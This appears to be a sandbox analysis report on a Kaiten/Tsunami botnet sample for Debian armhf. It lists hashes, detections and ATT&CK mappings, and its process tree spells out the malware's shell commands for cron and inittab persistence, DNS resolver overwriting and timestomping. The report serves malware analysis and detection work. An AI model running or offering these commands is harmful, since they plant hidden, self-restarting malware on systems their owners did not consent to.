kaiten | 8fb043c6e802a5d71bc908fe3a652f0076a7975310ce8772869b3980b1189c84

Analysis

max time kernel
150s
max time network
158s
platform
debian-12_armhf
resource
debian12-armhf-20240221-en
resource tags

arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem
submitted
30-07-2024 00:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
Size

573KB
MD5

69278e9f629f9b18ab8f80e18b422986
SHA1

11217cac6023d4b0eddf7955b01ee22ee83d8fa8
SHA256

8fb043c6e802a5d71bc908fe3a652f0076a7975310ce8772869b3980b1189c84
SHA512

edd5cfa6bfd7a9d4a517955d941df3fc680897c2d0c1a89dc3d9c07a8329927bfd462cb28a072e01698dbdea14760874b3ba9c61f2733a47ced09610ee6d6e79
SSDEEP

12288:xgzrhDDhR68i/YkE1a+ZdVI4GvTIy6Q3xxPlitj4QqufXtIJ:xgdhR69u1aYGvTIyDxxPUFTi

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/709-1-0x00008000-0x001b23c8-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	sh

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.n3qe0k	crontab

Reads runtime system information 5 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/1/cmdline	69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.udev.rules	69278e9f629f9b18ab8f80e18b422986_JaffaCakes118

/tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
/tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
1⤵
- Reads runtime system information
- Writes file to tmp directory
PID:709
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  - Writes DNS configuration
  PID:718
- /bin/sh
  sh -c "chmod 700 /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118 > /dev/null 2>&1 &"
  2⤵
  PID:722
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118"
  2⤵
  PID:725
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
    3⤵
    PID:727
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
  2⤵
  PID:729
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:732
- - /usr/bin/grep
    grep -v /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
    3⤵
    - Reads runtime system information
    PID:733
- - /usr/bin/grep
    grep -v "no cron"
    3⤵
    - Reads runtime system information
    PID:734
- - /usr/bin/grep
    grep -v lesshts/run.sh
    3⤵
    - Reads runtime system information
    PID:735
- /bin/sh
  sh -c "echo \"* * * * * /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
  2⤵
  PID:738
- /bin/sh
  sh -c "crontab /var/run/.x001804289383"
  2⤵
  PID:740
- - /usr/bin/crontab
    crontab /var/run/.x001804289383
    3⤵
    - Creates/modifies Cron job
    PID:742
- /bin/sh
  sh -c "rm -rf /var/run/.x001804289383"
  2⤵
  PID:746
- - /usr/bin/rm
    rm -rf /var/run/.x001804289383
    3⤵
    PID:748
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118\" > /etc/inittab2"
  2⤵
  PID:750
- - /usr/bin/cat
    cat /etc/inittab
    3⤵
    PID:752
- - /usr/bin/grep
    grep -v /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
    3⤵
    - Reads runtime system information
    PID:753
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118\" >> /etc/inittab2"
  2⤵
  PID:756
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:758
- - /usr/bin/cat
    cat /etc/inittab2
    3⤵
    PID:760
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:763
- - /usr/bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:764
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:766
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:769
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:771
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:773
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:774
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:776
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:778
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:780

/usr/bin/chmod
chmod 700 /tmp/69278e9f629f9b18ab8f80e18b422986_JaffaCakes118
1⤵
PID:724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
67B

MD5
59682ede5c9b177b86bcaf52a4f5a11e

SHA1
ad9b758ee3bf04600d09c5493a5af21d224519fb

SHA256
ded080d774bc034e422595fb847d22ab42fff66123af5e8f660b40c621eed970

SHA512
2af0d7fd1d5762c4b3f0a5bb8b81915a2ae6a188eae5c313b413c5b04fb0b402b49c2c8c11870cd4b0ddf488af655dcd91fe576b587bd187f27abb3ddf185db9

Download Submit
/run/.x001804289383

Filesize
81B

MD5
17cd2d2f5e57b4c03dd04aee77be796c

SHA1
e86e65277892a7f176ddeb70b38c761614562df0

SHA256
a5afcd18ec0761420ff214ac412fc2fecd0cfabfeb387bc6763e8391d61d8ec8

SHA512
8e98e10f6aeb83f668cac0e069f515da8ad6d4e5b375a8753dd2b12ba22995077597d54890531632993fbcfa39098fb68fdc57410559bb2952b3e48702d1e938

Download Submit
/var/spool/cron/crontabs/tmp.n3qe0k

Filesize
278B

MD5
2a445d70dda0980485280468472d1aa2

SHA1
f63d7b7d7cf7c9c3acb264be2ed38bc691c5804e

SHA256
9f78943fee2d7f0ec69385d73a21102bf998a9d0cb96aa72a23027cfe5920e92

SHA512
69626f53570b451dac58b352204b8790a286dda8d2371c6eac81bce251e6bd4ed2424c52921490d92183c67526068857742b020ce8ef94d907d439735656ee25

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads